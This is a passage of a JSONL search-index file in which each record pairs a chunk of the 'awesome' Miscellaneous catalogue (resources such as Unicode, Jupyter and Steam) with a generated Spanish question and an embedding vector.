-0.02001, 0.01492]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Unicode β€” Standards, quirks, packages and resources for Unicode. Code Points. Beginner-Friendly Projects. Katas. Tools for Activism. Citizen Science β€” For community-based and non-institutional scientists. MQTT β€” \"Internet of Things\" connectivity protocol. For Girls. Vorpal β€” Node.js CLI framework. Vulkan β€” Low-overhead, cross-platform 3D graphics and compute API. LaTeX β€” Typesetting language. Economics β€” An economist's starter kit. Funny Markov Chains. Bioinformatics. Cheminformatics β€” Informatics techniques applied to problems in chemistry. Colorful β€” Choose your next color scheme. Steam β€” Digital distribution platform. Bots β€” Building bots. Site Reliability Engineering. DTrace β€” Dynamic tracing framework. Userscripts β€” Enhance your browsing experience. PokΓ©mon β€” Resources for PokΓ©mon and PokΓ©mon GO. ChatOps β€” Managing technical and business operations through a chat. Falsehood β€” Falsehoods programmers believe in.", "indexar": "quΓ© herramienta me sirve para hacer ciencia ciudadana?", "v": [-0.04215, 0.01915, -0.00635, -0.10105, 0.04386, -0.20163, -0.16772, -0.08395, 0.02658, -0.12143, -0.01564, -0.07641, -0.01968, -0.01167, 0.03931, 0.00384, 0.16108, -0.03292, 0.03305, -0.06777, -0.05594, -0.11016, -0.07055, -0.10191, -0.11306, -0.00658, -0.00332, -0.0481, -0.09702, 0.11762, 0.05063, 0.11889, 0.04521, 0.02777, -0.19093, 0.09882, -0.00675, -0.07335, -0.04064, 0.03392, -0.177, 0.01588, -0.00749, 0.02995, -0.00981, 0.07379, -0.00807, -0.09459, -0.03552, 0.07588, -0.18072, -0.11215, -0.09459, 0.01609, -0.00561, 0.0086, 0.06851, -0.1336, -0.07457, -0.1072, -0.10059, 0.04131, -0.03363, -0.00471, -0.01601, -0.00884, 0.02346, -0.07158, -0.07412, 0.03248, -0.05964, -0.03408, 0.0691, -0.07337, -0.05109, -0.03417, -0.00647, -0.00142, 0.07084, -0.02215, 0.00193, 0.04412, -0.11275, -0.09961, 0.07595, 0.00983, 0.08345, -0.02599, -0.02765, -0.03647, -0.03891, 0.17439, 0.00888, 0.05773, 0.04306, -0.01699, 0.01016, -0.03148, -0.12783, 0.07637, 0.15109, -0.07006, -0.03724, 0.01535, -0.04328, -0.02247, -0.04995, -0.00181, -0.07421, 0.06408, 0.0404, 0.05637, -0.00065, -0.00883, -0.01803, 0.11097, -0.02, 0.00981, -0.06601, 0.01545, 0.00571, 0.06877, -0.07509, -0.10512, 0.03767, 0.0037, 0.03938, 0.00926, 0.00808, -0.07133, 0.00536, -0.06279, -0.04235, 0.01541, 0.04599, -0.05348, 0.03368, -0.17497, -0.05903, 0.01844, 0.11359, 0.02775, -0.09926, -0.08744, -0.08948, -0.08856, 0.04788, 0.02793, 0.0328, -0.03144, 0.06925, -0.09451, -0.04814, 0.06814, -0.05076, -0.08502, 0.02089, 0.00321, -0.05045, -0.02525, -0.05156, -0.03076, 0.05662, -0.0746, -0.0049, -0.04591, 0.05262, -0.04168, 0.02767, 0.07081, -0.00389, -0.00329, 0.04476, -0.08719, 0.10984, -0.06175, 0.00534, 0.06666, -0.03926, -0.1168, 0.00124, 0.02768, -0.02184, -0.0012, 0.10371, -0.03125, 0.00641, -0.03459, 0.03828, 0.00852, -0.00363, 0.01391, 0.08267, -0.03183, 0.04344, -0.02068, 0.08221, -0.04049, 0.0447, 0.06066, 0.01453, 0.00567, -0.00915, 0.03965, -0.03265, 0.06265, 0.05481, -0.03067, 0.01279, -0.02597, -0.00888, -0.00866, 0.02381, 0.01393, 0.02073, -0.00834, 0.01439, 0.07832, -0.06322, 0.00159, 0.03459, -0.04252, 0.00028, 0.03422, 0.03323, 0.05524, 0.02195, -0.00978, -0.01275, -0.05549, 0.0652, -0.05308, 0.08565, 0.0052, 0.00629, 0.00791, -0.02712, 0.01072, -0.04921, 0.00025, -0.05238, 0.01638, 0.01479, -0.04336, -0.03497, -0.00274, 0.02044, 0.00702, -0.05983, -0.01626, -0.02885, -0.03375, 0.03944, 0.022, 0.01202, 0.06544]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Unicode β€” Standards, quirks, packages and resources for Unicode. Code Points. Beginner-Friendly Projects. Katas. Tools for Activism. Citizen Science β€” For community-based and non-institutional scientists. MQTT β€” \"Internet of Things\" connectivity protocol. For Girls. Vorpal β€” Node.js CLI framework. Vulkan β€” Low-overhead, cross-platform 3D graphics and compute API. LaTeX β€” Typesetting language. Economics β€” An economist's starter kit. Funny Markov Chains. Bioinformatics. Cheminformatics β€” Informatics techniques applied to problems in chemistry. Colorful β€” Choose your next color scheme. Steam β€” Digital distribution platform. Bots β€” Building bots. Site Reliability Engineering. DTrace β€” Dynamic tracing framework. Userscripts β€” Enhance your browsing experience. PokΓ©mon β€” Resources for PokΓ©mon and PokΓ©mon GO. ChatOps β€” Managing technical and business operations through a chat. Falsehood β€” Falsehoods programmers believe in.", "indexar": "cuΓ‘l es una alternativa libre a Steam para distribuir software?", "v": [-0.0393, 0.01107, -0.10824, -0.1245, -0.06522, -0.09169, -0.12397, -0.13203, -0.08137, -0.04228, -0.08443, -0.13365, -0.05086, -0.12759, 0.06407, -0.05494, 0.03527, -0.08579, 0.12383, 0.04889, 0.01051, -0.00758, -0.1502, -0.15507, -0.02448, -0.03807, 0.00809, 0.00233, -0.11144, 0.05517, 0.06978, -0.14547, 0.1374, -0.16875, 0.01263, -0.08801, 0.17638, -0.02515, 0.12497, 0.04407, 0.06014, -0.05368, 0.06721, 0.02417, -0.01357, -0.01326, -0.0972, 0.00712, 0.05434, -0.02156, -0.07524, 0.01906, -0.04797, -0.12589, 0.12723, -0.06855, 0.03803, -0.11607, -0.00586, -0.06319, -0.03604, 0.01639, 0.07029, -0.04399, -0.01624, 0.06625, -0.14639, -0.04689, -0.07874, 0.14168, 0.01855, 0.01014, 0.04723, 0.02464, -0.04082, 0.04446, -0.09892, -0.04536, -0.01103, 0.03998, 0.09809, -0.05362, 0.10462, 0.01403, 0.04635, -0.1582, 0.1378, -0.12992, 0.05242, 0.00943, -0.00586, -0.06117, -0.067, 0.17589, 0.05336, -0.0853, 0.09502, 0.0313, -0.02674, 0.08483, -0.04796, -0.05354, -0.10517, 0.05207, -0.08207, -0.07726, -0.00891, -0.03208, -0.06467, 0.01857, 0.01874, 0.03355, 0.02389, 0.06936, -0.01217, -0.02515, 0.00239, -0.02314, 0.10468, 0.03528, 0.0751, -0.04258, -0.03467, -0.01769, 0.06049, 0.01071, 0.01281, 0.07544, -0.12406, -0.02537, 0.01642, -0.1024, -0.05196, -0.00039, -0.14244, -0.06106, 0.07975, -0.03026, 0.01391, -0.01832, -0.00959, 0.03561, 0.02706, 0.01567, 0.06953, -0.03003, 0.00542, -0.03626, -0.02127, -0.07996, -0.01022, 0.01673, -0.02605, 0.02844, -0.02077, 0.01384, 0.01128, 0.02747, -0.12056, 0.07747, 0.0452, 0.01028, -0.06579, -0.00685, 0.01197, -0.02633, 0.02285, 0.01116, -0.04127, 0.00597, 0.00506, 0.11719, 0.05233, -0.0172, 0.00023, -0.05127, 0.00354, -0.04527, -0.05047, -0.00652, -0.01503, 0.01379, -0.03363, -0.02999, -0.03178, -0.03254, -0.02989, 0.0044, -0.00356, 0.05051, -0.02444, -0.00392, -0.01101, -0.09452, 0.03554, 0.01042, 0.01316, -0.03518, -0.01731, 0.006, -0.08649, 0.00769, -0.06412, -0.03336, -0.0079, -0.01088, 0.01076, 0.07102, -0.02933, 0.07289, 0.03231, -0.00368, 0.08219, 0.03972, -0.03677, 0.015, 0.04055, -0.02011, 0.04482, -0.0407, 0.00241, -3e-05, 0.05197, -0.02538, -0.00036, 0.02518, 0.01696, 0.05898, -0.01362, 0.00596, 0.02256, 0.02472, 0.04647, 0.03048, -0.00765, 0.00182, 0.00368, 0.02809, -0.00805, -0.03696, 0.00662, 0.05214, -0.00305, -0.0346, -0.06412, -0.02383, -0.07362, -0.04617, -0.05423, -0.03675, -0.06245, -0.03704, 0.02864, -0.01343, -0.03617, 0.00076]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Domain-Driven Design β€” Software development approach for complex needs by connecting the implementation to an evolving model. Quantified Self β€” Self-tracking through technology. Web Design β€” For digital designers. Creative Coding β€” Programming something expressive instead of something functional. No-Login Web Apps β€” Web apps that work without login. Free Software β€” Free as in freedom. Framer β€” Prototyping interactive UI designs. Markdown β€” Markup language. Dev Fun β€” Funny developer projects. Magento 2 β€” Open Source eCommerce built with PHP. TikZ β€” Graph drawing packages for TeX/LaTeX/ConTeXt. Ad-Free β€” Alternatives without ads. Prometheus β€” Open-source monitoring system. Homematic β€” Smart home devices. Ledger β€” Double-entry accounting on the command-line. Web Monetization β€” A free open web standard service that allows you to send money directly in your browser. Uncopyright β€” Public domain works. Crypto Currency Tools & Algorithms β€” Digital currency where encryption is used to regulate the generation of units and verify transfers.", "indexar": "que enfoque de desarrollo de software sirve para manejar necesidades complejas?", "v": [0.0982, 0.04061, -0.16593, -0.24821, 0.01178, -0.06299, -0.08367, 0.01367, -0.11168, -0.05552, -0.00222, 0.00653, -0.0337, -0.15072, -0.05281, 0.03025, 0.07223, -0.13613, -0.04821, 0.08941, 0.02547, -0.0285, -0.04332, -0.03972, -0.13461, -0.02587, 0.02188, -0.11124, -0.13349, 0.00847, -0.0028, 0.04998, 0.04278, 0.01711, -0.01943, -0.00617, -0.11311, -0.06374, -0.04423, 0.01295, -0.00424, -0.03427, -0.03951, 0.03702, 0.07481, 0.0104, 0.08485, 0.07304, 0.00396, 0.04313, -0.05622, 0.05697, 0.02567, 0.00257, 0.11796, -0.05485, 0.00868, -0.01125, 0.01337, -0.02416, -0.15586, 0.04035, 0.01861, -0.09534, -0.02089, -0.14969, 0.00774, -0.03851, -0.08693, -0.05128, -0.07241, 0.05021, 0.07477, -0.00242, 0.01091, -0.04325, 0.01102, 0.03277, -0.02835, 0.05394, 0.04044, 0.01971, -0.15085, 0.10999, -0.05266, -0.11463, 0.15198, 0.00836, 0.03191, -0.05241, 0.02055, -0.04024, -0.07906, 0.0127, -0.01526, -0.02733, 0.08505, 0.13585, 0.16111, 0.08081, -0.03075, -0.12282, -0.00598, 0.01722, -0.11975, 0.02805, 0.15009, -0.08169, -0.10128, -0.01497, -0.05078, 0.05691, 0.07988, -0.03824, -0.03354, -0.01583, -0.0212, -0.00728, -0.00134, -0.09573, 0.0334, -0.00531, -0.03834, -0.08653, -0.03598, -0.0572, -0.04111, 0.13542, 0.04582, 0.02612, -0.0638, -0.08792, -0.02725, 0.06909, 0.0657, 0.04382, 0.10381, -0.05226, 0.02285, 0.03369, 0.01491, 0.02908, -0.01127, -0.042, 0.09382, -0.03205, 0.04965, -0.03935, -0.00889, 0.00089, 0.02277, -0.01817, 0.10313, 0.01543, -0.11132, -0.05336, -0.0297, 0.00084, -0.00716, 0.05629, -0.01764, 0.05583, -0.04962, -0.04421, 0.02816, -0.08301, -0.02654, 0.04755, 0.10172, 0.09092, -0.07065, 0.01781, 0.05451, -0.02499, -0.02848, -0.06651, -0.05428, -0.04437, -0.05319, -0.04127, -0.07469, 0.06208, 0.01825, 0.05026, -0.0174, -0.03384, -0.09898, -0.0321, 0.00396, -0.02146, 0.02766, 0.0162, 0.00048, -0.15543, 0.04041, 0.00125, -0.09038, -0.04843, -0.00649, -0.05684, 0.02147, 0.00549, -0.01056, -0.02857, -0.00066, 0.0798, 0.0033, 0.0742, -0.00771, 0.08453, 0.00807, 0.01851, 0.07788, 0.03247, -0.00294, -0.06803, 0.03361, 0.06104, 0.0387, 0.00752, -0.03927, -0.03406, 0.02215, 0.00223, 0.03162, -0.00387, -0.02452, 0.03513, 0.03417, 0.00376, -0.00994, 0.0723, -0.08513, -0.01322, -0.02102, 0.04316, 0.0006, -0.02623, -0.04071, -0.08523, 0.04873, 0.03939, -0.03126, -0.07344, -0.06069, -0.04318, -0.04724, -0.02087, 0.00735, -0.05518, -0.05781, -0.00092, 0.01105, 0.04329, 0.03474, -0.01898]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Domain-Driven Design β€” Software development approach for complex needs by connecting the implementation to an evolving model. Quantified Self β€” Self-tracking through technology. Web Design β€” For digital designers. Creative Coding β€” Programming something expressive instead of something functional. No-Login Web Apps β€” Web apps that work without login. Free Software β€” Free as in freedom. Framer β€” Prototyping interactive UI designs. Markdown β€” Markup language. Dev Fun β€” Funny developer projects. Magento 2 β€” Open Source eCommerce built with PHP. TikZ β€” Graph drawing packages for TeX/LaTeX/ConTeXt. Ad-Free β€” Alternatives without ads. Prometheus β€” Open-source monitoring system. Homematic β€” Smart home devices. Ledger β€” Double-entry accounting on the command-line. Web Monetization β€” A free open web standard service that allows you to send money directly in your browser. Uncopyright β€” Public domain works. Crypto Currency Tools & Algorithms β€” Digital currency where encryption is used to regulate the generation of units and verify transfers.", "indexar": "con quΓ© puedo hacer el seguimiento personal a travΓ©s de tecnologΓ­a?", "v": [-0.067, 0.21883, -0.14202, -0.09773, 0.09496, -0.06333, 0.02064, -0.02992, 0.04035, -0.04993, -0.10687, 0.07569, 0.02851, 0.01201, 0.03972, -0.02076, 0.12319, -0.06446, 0.10202, 0.04207, -0.01634, -0.03546, -0.16672, -0.11295, 0.05226, -0.06343, 0.04457, -0.06871, -0.14512, -0.00873, -0.0038, -0.00959, 0.01354, 0.02244, -0.09833, -0.00533, 0.00983, 0.11629, -0.00148, -0.04988, -0.02327, -0.04505, 0.04091, 0.06177, 0.25419, -0.00205, 0.02823, -0.00573, -0.01163, -0.04748, -0.1253, 0.03854, -0.05511, -0.03591, -0.00892, -0.0108, 0.1364, -0.09795, 0.0922, -0.09353, -0.00322, -0.029, -0.02454, 0.07323, 0.012, -0.0774, 0.043, -0.10692, -0.08011, -0.00301, 0.03012, -0.08968, -0.0763, -0.00108, 0.03491, 0.03942, -0.01989, 0.0361, 0.02703, -0.05653, -0.06277, 0.0121, -0.06674, -0.01699, -0.04164, 0.03808, 0.0729, -0.00461, -0.0169, -0.1612, 0.10823, 0.14229, -0.0147, -0.10324, 0.0185, 0.09416, 0.04915, -0.0553, -0.11302, 0.10201, 0.05076, -0.0452, -0.02088, 0.04491, -0.00563, 0.01997, 0.01655, -0.07756, 0.01865, -0.0655, -0.05898, 0.04489, -0.10905, -0.03988, -0.06873, 0.04108, -0.06108, -0.06832, -0.06451, 0.02656, -0.10486, 0.03132, -0.01777, -0.14658, 0.11291, -0.02829, -0.0886, 0.04335, -0.00381, -0.00624, 0.03474, -0.02538, -0.04217, -0.03459, 0.07739, 0.04479, -0.06857, -0.04834, 0.02275, -0.03758, 0.0796, 0.03301, -0.03065, -0.02432, 0.02812, -0.10668, -0.00537, -0.05944, -0.10199, -0.03687, -0.01995, 0.03391, -0.04594, 0.00667, -0.03479, -0.0324, 0.02026, -0.03302, 0.00586, 0.05868, -0.01695, 0.05986, -0.05355, 0.06075, 0.01027, -0.02599, 0.02773, -0.00841, 0.0365, 0.05573, -0.13142, 0.03746, -0.0181, -0.08272, 0.02125, -0.02836, -0.07856, 0.01237, 0.01637, -0.08381, -0.12151, 0.06641, 0.00175, -0.04881, 0.0506, -0.0388, -0.09313, 0.01525, 0.01638, 0.08138, -0.01788, 0.01135, 0.02254, 0.06493, -0.00531, -0.0402, -0.00615, 0.02875, -0.00461, 0.02307, -0.0823, 0.02639, -0.02462, -0.04159, -0.05251, 0.07142, -0.05186, -0.02785, 0.00066, -0.02329, 0.03871, -0.04172, 0.06823, -0.00973, -0.06531, 0.03951, -0.02442, -0.06302, -0.01525, 0.03073, 0.10607, 0.00456, 0.01804, 0.01545, -0.00731, 0.08891, 0.04708, 0.02412, -0.01355, -0.05147, -0.01209, -0.00431, 0.00651, -0.03009, 0.04848, 0.04567, -0.01821, -0.03248, -0.09827, -0.04136, 0.04322, 0.0854, -0.0359, -0.00907, -0.00502, -0.04047, -0.12994, 0.05031, 0.00076, -0.08686, -0.00406, 0.03511, 0.03152, -0.04048, 0.05356, 0.01549]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Domain-Driven Design β€” Software development approach for complex needs by connecting the implementation to an evolving model. Quantified Self β€” Self-tracking through technology. Web Design β€” For digital designers. Creative Coding β€” Programming something expressive instead of something functional. No-Login Web Apps β€” Web apps that work without login. Free Software β€” Free as in freedom. Framer β€” Prototyping interactive UI designs. Markdown β€” Markup language. Dev Fun β€” Funny developer projects. Magento 2 β€” Open Source eCommerce built with PHP. TikZ β€” Graph drawing packages for TeX/LaTeX/ConTeXt. Ad-Free β€” Alternatives without ads. Prometheus β€” Open-source monitoring system. Homematic β€” Smart home devices. Ledger β€” Double-entry accounting on the command-line. Web Monetization β€” A free open web standard service that allows you to send money directly in your browser. Uncopyright β€” Public domain works. Crypto Currency Tools & Algorithms β€” Digital currency where encryption is used to regulate the generation of units and verify transfers.", "indexar": "cuales son las herramientas recomendadas para diseΓ±ar interfaces interactivas?", "v": [0.30503, 0.15548, -0.12273, -0.09608, 0.1553, -0.12189, -0.04376, -0.02265, -0.02248, -0.03963, 0.00935, -0.09017, -0.08092, -0.17795, 0.09002, 0.05841, 0.10572, -0.0554, -0.00702, -0.00519, 0.01855, 0.11722, -0.22955, -0.01768, -0.08221, -0.09692, 0.01589, -0.04527, -0.07154, 0.07625, -0.04254, -0.05756, 0.08647, -0.01575, -0.17836, -0.14709, -0.04603, 0.018, 0.05957, -0.01861, -0.03495, 0.02586, -0.08415, 0.04667, 0.07243, 0.00265, -0.04225, -0.04346, -0.01484, 0.09653, -0.10298, -0.04121, 0.0194, 0.0744, 0.07644, -0.2013, 0.14346, -0.08202, 0.00364, -0.0947, 0.01652, 0.01377, -0.00948, -0.00174, 0.02214, -0.01283, -0.13587, -0.13435, -0.07122, 0.06571, 0.03194, 0.00912, 0.03322, -0.02117, 0.06744, 0.03086, 0.00107, 0.03469, 0.14559, -0.00337, -0.02912, -0.0146, 0.00689, 0.00499, -0.03174, -0.00231, 0.02357, -0.05513, -0.01021, -0.05858, 0.0133, -0.02582, -0.0399, -0.01781, -0.05536, -0.02171, 0.06419, 0.08326, 0.10325, -0.00618, -0.04251, -0.06983, -0.06815, 0.04919, 0.01108, -0.02367, -0.00684, 0.03636, -0.0172, 0.00597, 0.02297, 0.03728, 0.08977, -0.03267, -0.03128, -0.01702, -0.0462, -0.04821, -0.01329, -0.03858, -0.0165, 0.00804, -0.02204, -0.02153, 0.01826, 0.05411, -0.02631, 0.04243, 0.02567, -0.0541, -0.0396, -0.10485, -0.01167, -0.02639, -0.02772, 0.02216, 0.02128, -0.05914, -0.03039, -0.08322, 0.08431, 0.06871, -0.00463, -0.07914, -0.01835, 0.05004, 0.04988, -0.02447, -0.01999, 0.06233, -0.01254, 0.02136, 0.04308, -0.02149, -0.04826, 0.02347, -0.02274, 0.00465, -0.07425, 0.08125, -0.03923, 0.00892, -0.00828, 0.03003, 0.04804, -0.0225, -0.06315, 0.04484, 0.06866, 0.03469, 0.0491, 0.11733, 0.02847, -0.02392, -0.02129, -0.04624, -0.02043, -0.0122, -0.03668, -0.09276, -0.00823, 0.05294, -0.04361, 0.00797, -0.02924, -0.08951, 0.00793, -0.03203, 0.00722, 0.06627, -0.07537, 0.07783, -0.01785, 0.00909, 0.11241, -0.03256, 0.07001, 0.05871, -0.08706, -0.04327, -0.00063, -0.02142, -0.03864, -0.04426, 0.01133, 0.05355, -0.03253, 0.03962, 0.00509, 0.03627, 0.03351, -0.04478, 0.06225, 0.00072, 0.00891, -0.01929, -0.02574, -0.03388, 0.02474, 0.03988, 0.00957, 0.02246, 0.00818, -0.05126, 0.02914, 0.02793, 0.00203, 0.01149, 0.00102, -0.00191, 0.04637, -0.04644, -0.01023, 0.02624, -0.0043, -0.0085, -0.01132, -0.00712, -0.0274, -0.05313, -0.00363, 0.11966, -0.02064, 0.00348, -3e-05, -0.0987, -0.03133, -0.0256, -0.06975, -0.1255, -0.02054, 0.03019, 0.08088, -0.00388, -0.05767, -0.06736]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Open Source Supporters β€” Companies that offer their tools and services for free to open source projects. Design Principles β€” Create better and more consistent designs and experiences. Theravada β€” Teachings from the Theravada Buddhist tradition. inspectIT β€” Open source Java app performance management tool. Open Source Maintainers β€” The experience of being an open source maintainer. Calculators β€” Tools for every platform. Captcha β€” A type of challenge–response test used in computing to determine whether or not the user is human. Jupyter β€” Create and share documents that contain code, equations, visualizations and narrative text. FIRST Robotics Competition β€” International high school robotics championship. Speakers β€” Conference and meetup speakers in the programming and design community. Board Games β€” Table-top gaming fun for all. Software Patreons β€” Fund individual programmers or the development of open source projects. Parasite β€” Parasites and host-pathogen interactions. Food β€” Projects on GitHub related to food.", "indexar": "que programa puedo usar para crear documentos con cΓ³digo y visualizaciones?", "v": [-0.05996, -0.00372, -0.21197, -0.13611, 0.02596, -0.1866, 0.02017, -0.02765, -0.04298, -0.17558, -0.04771, -0.20837, -0.03212, -0.11305, -0.04173, 0.02297, 0.17955, -0.15739, 0.02125, 0.01389, 0.05584, -0.03633, -0.06355, -0.05437, -0.06407, 0.03462, 0.02881, -0.06546, -0.01589, -0.05681, -0.01075, 0.05084, 0.04683, -0.01882, -0.0882, -0.00378, 0.10482, 0.04034, -0.08881, 0.09429, -0.0257, 0.09392, -0.09254, 0.12774, -0.02592, 0.04204, 0.04909, 0.12645, -0.09436, -0.00374, -0.02433, 0.00044, -0.11649, 0.0531, 0.06616, -0.15116, 0.07073, -0.17673, -0.08114, 0.00105, 0.01144, 0.00891, 0.03612, -0.04761, -0.01895, -0.01204, 0.13862, 0.02546, -0.10471, 0.07511, -0.0406, 0.0196, 0.01741, -0.03036, 0.065, 0.04488, -0.11313, -0.13201, -5e-05, 0.04063, -0.01877, 0.03282, -0.04467, -0.00497, -0.0939, -0.06844, 0.00524, -0.01585, 0.02904, -0.10211, 0.0301, 0.03765, 0.02224, 0.01477, 0.05732, 0.0181, 0.03304, 0.03259, 0.00188, 0.04695, 0.01733, -0.0869, -0.02056, 0.0677, 0.06058, 0.02007, 0.10838, -0.02135, -0.04868, 0.06225, -0.07048, -0.03419, -0.124, 0.03063, -0.10678, -0.03718, 0.01049, -0.01096, 0.02019, -0.11048, 0.00095, 0.03451, -0.08019, 0.06145, 0.07915, -0.01862, 0.03526, 0.13081, -0.09214, 0.04367, -0.02895, 0.00024, -0.08005, -0.03072, -0.02006, -0.02742, 0.0279, -0.04193, 0.0203, 0.01352, -0.00671, -0.00731, 0.02592, 0.09541, -0.02996, 0.03645, -0.0382, -0.0704, -0.06995, 0.0059, 0.03225, 0.00972, -0.03875, -0.00129, -0.09964, 0.05243, 0.02615, 0.01116, -0.08722, -0.03744, -0.08302, 0.04582, -0.05227, 0.01632, 0.04454, -0.06823, -0.02734, 0.04015, 0.0585, 0.0497, 0.05027, 0.00519, 0.08304, -0.09236, 0.05733, -0.05096, -0.01249, -0.04501, -0.07648, -0.02524, -0.07405, 0.06994, 0.06336, 0.01646, 0.00793, -0.03402, 0.02721, 0.02846, 0.0334, -0.04237, -0.05161, 0.08341, 0.03067, 0.00898, -0.00635, -0.02854, 0.02172, -0.02456, -0.00223, -0.09874, -0.04423, 0.02671, -0.00738, -0.07157, 0.04444, 0.07367, -0.06007, 0.03329, 0.01519, 0.09008, -0.00138, -0.06944, 0.05796, -0.00815, -0.07846, -0.00636, -0.01009, 0.05716, 0.045, -0.03194, 0.05791, -0.01447, -0.01831, 0.01372, 0.05921, -0.0789, 0.02833, 0.05647, -0.00192, 0.01518, -0.03161, 0.00989, -0.00593, -0.01275, 0.02149, 0.04509, -0.02898, -0.04212, -0.04458, -0.08346, -0.02137, 0.08805, -0.03869, -0.03729, -0.03589, 0.0216, -0.06014, -0.01086, -0.00838, -0.02106, 0.01408, -0.00236, 0.06589, -0.07379, 0.02175, 0.01151]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Open Source Supporters β€” Companies that offer their tools and services for free to open source projects. Design Principles β€” Create better and more consistent designs and experiences. Theravada β€” Teachings from the Theravada Buddhist tradition. inspectIT β€” Open source Java app performance management tool. Open Source Maintainers β€” The experience of being an open source maintainer. Calculators β€” Tools for every platform. Captcha β€” A type of challenge–response test used in computing to determine whether or not the user is human. Jupyter β€” Create and share documents that contain code, equations, visualizations and narrative text. FIRST Robotics Competition β€” International high school robotics championship. Speakers β€” Conference and meetup speakers in the programming and design community. Board Games β€” Table-top gaming fun for all. Software Patreons β€” Fund individual programmers or the development of open source projects. Parasite β€” Parasites and host-pathogen interactions. Food β€” Projects on GitHub related to food.", "indexar": "existe alguna herramienta de gestiΓ³n de rendimiento de aplicaciones Java gratuita?", "v": [-0.12852, 0.11856, -0.07323, -0.31972, 0.0047, -0.06439, -0.0949, 0.01003, -0.09267, -0.04051, -0.05473, -0.16461, -0.0067, 0.03718, 0.08632, 0.07991, 0.10752, -0.08998, -0.03534, -0.00964, -0.05767, 0.0732, -0.10265, -0.08699, -0.12517, 0.11637, 0.01104, -0.03334, -0.14063, -0.00929, 0.07125, -0.02887, 0.09906, -0.13438, -0.12887, -0.00864, -0.00348, -0.04267, -0.02852, 0.05015, 0.04921, 0.04784, 0.03623, -0.01052, 0.02937, 0.0835, 0.05403, 0.07302, -0.04762, -0.02146, -0.05161, -0.10982, -0.06735, 0.00757, 0.02181, -0.13203, 0.09048, -0.13052, 0.04232, -0.16558, -0.12354, 0.0606, -0.07519, -0.10926, 0.07016, -0.04576, 0.10668, -0.06237, -0.08146, 0.07544, 0.04061, 0.08755, -0.04584, 0.02011, 0.04472, -0.00516, 0.00309, 0.08907, -0.00525, 0.02787, 0.00675, -0.07538, -0.00432, -0.00484, -0.1097, -0.10815, 0.0229, -0.04612, 0.08541, -0.00837, -0.05912, -0.00183, -0.05618, 0.02631, -0.00249, -0.0174, 0.11336, -0.00023, 0.11704, 0.05123, 0.03737, -0.0216, -0.07975, -0.04445, -0.02469, 0.12684, -0.00678, -0.10312, -0.0815, 0.01914, 0.07761, -0.0822, 0.04885, 0.05464, -0.04467, 0.01082, -0.01411, -0.06091, -0.00313, -0.03615, -0.04702, -0.05444, -0.01864, -0.05756, 0.03885, -0.00738, -0.02294, 0.16331, 0.01084, -0.01243, 0.02536, -0.08766, -0.06574, 0.02859, -0.06722, 0.00968, 0.06581, -0.04851, 0.01595, -0.04718, -0.04783, 0.06749, -0.01361, -0.00447, 0.05248, -0.00749, 0.03743, 0.00216, 0.02667, -0.00693, 0.05708, -0.10775, -0.03069, 0.04718, -0.07115, -0.0202, 0.0204, -0.0008, -0.06684, 0.01408, -0.03159, -0.02752, -0.04745, 0.0418, -0.038, -0.02776, 0.07009, 0.05126, 0.03175, 0.12967, 0.00791, 0.04744, 0.07624, -0.08106, -0.02937, -0.08093, 0.00013, -0.01831, 0.01721, -0.08969, -0.00375, -0.04252, 0.01855, -0.05604, 0.01494, -0.05048, 0.00023, -0.0131, -0.05071, 0.01864, 0.04692, 0.04881, 0.03812, -0.05016, 0.04462, 0.00284, -0.00434, -0.11783, -0.00857, 0.00128, -0.07596, -0.03016, -0.04095, -0.03027, 0.02559, 0.07976, 0.00628, -0.00797, -0.01807, 0.04789, 0.01507, 0.08396, 0.00485, 0.00963, 0.01666, -0.06347, 0.03143, 0.01094, 0.01757, -0.03337, -0.02516, -0.04123, 0.01273, 0.00504, 0.0348, 0.0233, -0.00384, 0.01519, 0.00277, -0.01384, 0.05508, -0.01886, -0.01092, -0.02804, 0.0039, -0.02893, 0.05311, -0.03135, -0.00383, -0.01852, -0.0519, 0.05503, 0.05513, -0.01886, -0.06735, -0.04873, -0.02409, -0.05763, -0.03187, -0.07624, -0.00513, 0.01715, 0.04585, 0.00824, 0.0045, -0.021]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Open Source Supporters β€” Companies that offer their tools and services for free to open source projects. Design Principles β€” Create better and more consistent designs and experiences. Theravada β€” Teachings from the Theravada Buddhist tradition. inspectIT β€” Open source Java app performance management tool. Open Source Maintainers β€” The experience of being an open source maintainer. Calculators 